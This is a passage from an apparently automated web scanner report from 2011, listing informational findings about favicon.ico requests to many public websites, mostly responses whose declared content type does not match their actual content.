Set-Cookie: PHPSESSID=ckguqfdilu9pmnj7sfqargiqc0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 372
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
</head>
<body>

<div id="header-error">Error</div>

<div class="login-e
...[SNIP]...
25.37. http://www.tidaltv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tidaltv.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tidaltv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
p3p: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:33:49 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>
25.38. http://www.trafficrevenue.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.trafficrevenue.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trafficrevenue.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 406 Not Acceptable
Date: Sat, 02 Apr 2011 13:24:03 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: max-age=30, public
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 372

<html>
<head><title> 406 Not Acceptable
</title></head>
<body><h1> 406 Not Acceptable
</h1>
This request is not acceptable<hr />
Powered By <a href='http://www.litespeedtech.com'>LiteSpeed Web Serve
...[SNIP]...
25.39. http://www.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verisign.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:06:34 GMT
Server: Apache
Set-Cookie: v1st=1ECA364D37B527F1; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verisign.com
Last-Modified: Wed, 19 Jan 2011 20:36:59 GMT
ETag: "28e933b-1536-49a38fa8970c0"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/html

............ .h...&... .... .........(....... ..... ........................................
xP.dU...E...E...F...]*...b.:.............................{.#U...U....................Y..E...yQ............
...[SNIP]...
25.40. http://www.verizon.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizon.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.verizon.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 12346
Content-Type: text/html
Vary: Accept-Encoding
Expires: Sat, 02 Apr 2011 13:37:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:47 GMT
Connection: close
Set-Cookie: ASPSESSIONIDACTBSRTC=NNIKMLGDFJLLCPKHOIDHPHBF; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <title>Verizon Online - Page Not Found</title>
   <meta http-equi
...[SNIP]...
25.41. http://www.woot.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.woot.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.woot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sat, 02 Apr 2011 13:33:10 GMT
Expires: Sat, 09 Apr 2011 13:33:11 GMT
Server: Microsoft-IIS/7.5
Via: 1.1 C aicache6
X-Powered-By: ASP.NET
Content-Length: 103
Connection: keep-alive

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
25.42. http://www.xe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xe.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xe.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:24 GMT
Server: Apache
Set-Cookie: ID=173.193.214.243.1301752224347582; path=/; expires=Fri, 28-Mar-31 13:50:24 GMT
Last-Modified: Fri, 03 Sep 2010 13:21:25 GMT
ETag: "3780f7-f1-ceba7f40"
Accept-Ranges: bytes
Content-Length: 241
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0
Connection: close
Content-Type: text/html

<HTML>
<HEAD><TITLE>Autoextraction Prohibited</TITLE></HEAD>
<BODY>
Automated extraction of our content is prohibited. See <A HREF="http://www.xe.com/errors/noautoextract.htm">http://www.xe.com/error
...[SNIP]...
25.43. http://www.y8.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.y8.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.y8.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Sat, 02 Apr 2011 13:35:25 GMT
Content-Type: text/html
Content-Length: 169
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.64</center>
</body>
</html>
25.44. http://www.yfrog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.yfrog.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yfrog.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.37
Date: Sat, 02 Apr 2011 13:27:19 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.9
Content-Length: 1406

..............h.......(....... .......................................iXG...f...........................................................................................................................
...[SNIP]...
26. HTML uses unrecognised charset  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.videobash.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videobash.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:34:08 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Set-Cookie: is_really_pc=1; expires=Sun, 03-Apr-2011 13:34:08 GMT
Set-Cookie: vbvisit=1; path=/
Connection: close
Content-Type: text/html
Set-Cookie: RNLBSERVERID=ded543; path=/
Content-Length: 37609

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta property="fb:admins" content="100001134225913" />
       <meta http-equiv="Content-Type" content="text/html; charset=ISO88591" />
       <meta name="google-site-verification" content="qVbaeGD8rtAKGrL0XSPtJyDDWct383nA1VMA54i0N44" />
...[SNIP]...
27. Content type incorrectly stated  previous  next
There are 225 instances of this issue:

27.1. http://www.123greetings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.123greetings.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.123greetings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:20 GMT
Expires: Sat, 02 Apr 2011 13:26:54 GMT
Last-Modified: Fri, 19 Mar 2004 10:05:32 GMT
Cache-Control: max-age=900
Content-Type: text/plain; charset=UTF-8
ETag: "57e-168c5300"
Accept-Ranges: bytes
Server: Apache/2.2.3 (CentOS)
Content-Length: 1406
Connection: close

..............h.......(....... ...................................ee..AA..............RR..........~~....~......5...RA..$...bR..D........................................................................
...[SNIP]...
27.2. http://www.2wire.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.2wire.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.2wire.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:25:05 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 20 Oct 2010 20:38:29 GMT
ETag: "1d0bd-47e-64579b40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Set-Cookie: TwoWireLB=3217371914.20480.0000; path=/

............ .h.......(....... ..... .........................x(..x(..x(..x(..x(...mR..9..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..~2.......pU.x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(..x(
...[SNIP]...
27.3. http://www.43things.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.43things.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.43things.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:13:02 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 08 Dec 2004 23:03:38 GMT
Accept-Ranges: bytes
Content-Length: 350
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 14:13:03 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ...............................................................{...k...Z...J...B...1...!..........................P.$ ..N..    .......~.. .w...@~p.....0.p..~r.n.0G.~@)~..0.
...[SNIP]...
27.4. http://www.6waves.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.6waves.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a GIF image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6waves.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:09 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 10:08:50 GMT
ETag: "7c8853-438-49d68fb975080"
Accept-Ranges: bytes
Content-Length: 1080
Connection: close
Content-Type: text/plain

GIF89a........>j)Nv.'Q.#I.%L.$K+Pw.$JmE9.9f.2`.&O...(Mv"Hr.)V.(S*Ow.Al&Kt.*W.&P.&W.p.rZU..+..).j<>3?..& Eq4@[.*X.%MBOk"Ft/9U...]W^.)Utw..k..~ %Cj.u..j.$Ht<8E....f.76J:7D-/E%Kt..)h?4....w%....u...'.(\.
...[SNIP]...
27.5. http://www.aa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aa.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:00 GMT
Content-Type: text/plain
Last-Modified: Wed, 30 Sep 2009 14:35:22 GMT
Content-Length: 1406
Content-Language: en-US
Server: On-Demand Router/1.0
Via: On-Demand Router/1.0
Age: 1
Warning: 110 /10.243.14.54:12405 "Response is stale"
Vary: Accept-Encoding, User-Agent

..............h.......(....... ...........@.......................f33.33.......tY......f3..........iK.VM..........f]........l.yn........................................................................
...[SNIP]...
27.6. http://www.aarp.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aarp.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aarp.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:11 GMT
Server: Apache
Last-Modified: Sat, 02 Apr 2011 11:07:34 GMT
Accept-Ranges: bytes
Content-Length: 1406
NodeID: ws6-md.aarp.net
Cache-Control: no-cache
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww-md.aarp.org=2887690432.20480.0000; path=/

..............h.......(....... ...............................%2..........nw......6B..CO..........|...................Wa..w~............................................................................
...[SNIP]...
27.7. http://www.ad4game.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ad4game.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ad4game.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Sep 2008 00:20:02 GMT
ETag: "a5d731-47e-457993ecbd080"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ............................................................................................&...>...>...>...>...8...........................................<c...c.
...[SNIP]...
27.8. http://www.alibaba.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alibaba.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibaba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:24 GMT
Server: Apache/2.2.15 (Unix) mod_AliCookie(for apache2.x)/1.1 Beacon/3.2 mod_jk/1.2.28
Set-Cookie: ali_apache_id=173.193.214.243.64460051084706.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
Set-Cookie: ali_apache_sid=173.193.214.243.64460051084706.7|1301752884; path=/; domain=.alibaba.com
Last-Modified: Wed, 29 Dec 2010 15:54:08 GMT
ETag: "dc008-57e-4988e9451a800"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain

..............h.......(....... ...........@............................p...LL......t.......(H.0P......,Hx. XX.....4h.. 0@.0`...|...,,.........8x......0@X..00.. 0..............\\......|.......<D.<\..D`
...[SNIP]...
27.9. http://www.alibris.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alibris.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibris.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:33 GMT
Server: Apache
Last-Modified: Mon, 28 Feb 2011 22:30:09 GMT
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... .................................................1...A..#`..3...F...J...R...R...Z...Z...c...c............................0H.....p.Pzo..0..`o......./...0...    ...`_.......
...[SNIP]...
27.10. http://www.allbusiness.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allbusiness.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allbusiness.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:40 GMT
Server: Apache
Last-Modified: Thu, 18 Feb 2010 01:02:45 GMT
ETag: "47e"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .............................................0@@.........?UU.$00.0@@.-<<.(66..$$......        .....:fw.2LR..........4M..........Ln...-.9KH.:QP.2DC..)(.....qrr.Sf].K...GX
...[SNIP]...
27.11. http://www.allvoices.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.allvoices.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allvoices.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:32:31 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 17:01:20 GMT
ETag: "5c04af-37e-49fca3e0b9800"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/html; charset=UTF-8

..............h.......(....... .....................................................................................................>?.............................................u..g.................
...[SNIP]...
27.12. http://www.alphadictionary.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.alphadictionary.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alphadictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:33 GMT
Server: Apache/2.0.46 (Red Hat)
Last-Modified: Fri, 21 Oct 2005 16:19:00 GMT
ETag: "5a42d4-104a6-7f82500"
Accept-Ranges: bytes
Content-Length: 66726
Content-Type: text/plain; charset=ISO-8859-1

..............(....................... ..............00......h...............h...&.................. ..........V...00...........!..........h+...0..........H/...\.. .......4..V...00.......D......(.
...[SNIP]...
27.13. http://www.americantowns.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.americantowns.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americantowns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=ZONVIRS192.168.6.52CKMQY; path=/
Date: Sat, 02 Apr 2011 13:39:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 17 Dec 2010 19:33:56 GMT
ETag: "550604-436-497a0404a1100"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8

...... ..........&...........(.......(... ...@.......................................Hj..[.V.....C...643.5=..Y_\..{s.Tc..........DGW.....?B...3m............3.3.............3..""".....".""(=.3""".....
...[SNIP]...
27.14. http://www.andiesisle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.andiesisle.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.andiesisle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:50:10 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.16 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Wed, 16 Feb 2005 07:38:30 GMT
ETag: "7a186e-47e-4212f876"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... .........................................................................................%`@.,gJ..53...
..............................#6..[..0^...%D.........7rP.0.
...[SNIP]...
27.15. http://www.andkon.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.andkon.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.andkon.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:49:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 18 Jun 2010 20:48:22 GMT
ETag: "3ed8bd8-57e-135d9180"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain

..............h.......(....... ........................................t......................................###.............................................[...7...    .......f.......S...h.......    .
...[SNIP]...
27.16. http://www.apartmenthomeliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apartmenthomeliving.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmenthomeliving.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:18:33 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 28 Oct 2010 13:52:12 GMT
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...............................z...z..X...g...q..}v..t{(.....f.@.f.@.f.@.f.@.f.@.f.@.f.@...........z..X...k...}....&...8.......|...z...z...z...z...z.f.@...........
...[SNIP]...
27.17. http://www.apartmentratings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.apartmentratings.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartmentratings.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:40 GMT
Server: Apache
Last-Modified: Wed, 18 Aug 2010 21:44:46 GMT
ETag: "1cf3b8-57e-48e1ff9632f80"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 14:03:40 GMT
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerapt-www_POOL=1189351596.0.0000; path=/

..............h.......(....... ...........@.................................I.J....l..q._.&.....|...;.^.|...'.8........x&...Q..x....U.h.n.....U...0...
.....G..}1.C.....'.{.S..p...u..=........T.....O.
...[SNIP]...
27.18. http://www.arizona.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.arizona.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arizona.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (EL)
Content-Type: text/html; charset=iso-8859-1
cache-control: max-age=2419200
Content-Length: 45
Date: Sat, 02 Apr 2011 13:34:06 GMT
X-Varnish: 864489494 846145933
Via: 1.1 varnish
Connection: keep-alive
age: 0
clusternode: brandi

The requested file favicon.ico was not found.
27.19. http://www.aroundme.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.aroundme.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aroundme.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 16 Nov 2010 18:45:24 GMT
ETag: "80032d-47e-4952ff5a3d900"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=79251
Expires: Sun, 03 Apr 2011 12:14:12 GMT
Date: Sat, 02 Apr 2011 14:13:21 GMT
Connection: close

............ .h.......(....... ..... .....................................................................I..........)...............................................)d...?..........(................f.
...[SNIP]...
27.20. http://www.articlesbase.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.articlesbase.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.articlesbase.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:26:47 GMT
Server: Apache/2
Last-Modified: Thu, 31 Mar 2011 15:35:17 GMT
ETag: "47e-49fc90a4e7740"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:26:47 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.21. http://www.ask.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ask.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ask.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain
Content-Length: 1150
ETag: "5515a3-47e-49e8a3349e980"
Last-Modified: Tue, 15 Mar 2011 19:11:50 GMT
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 12:37:17 GMT
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.22. http://www.astrology.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.astrology.com
Path:   /favicon.ico

Issue detail

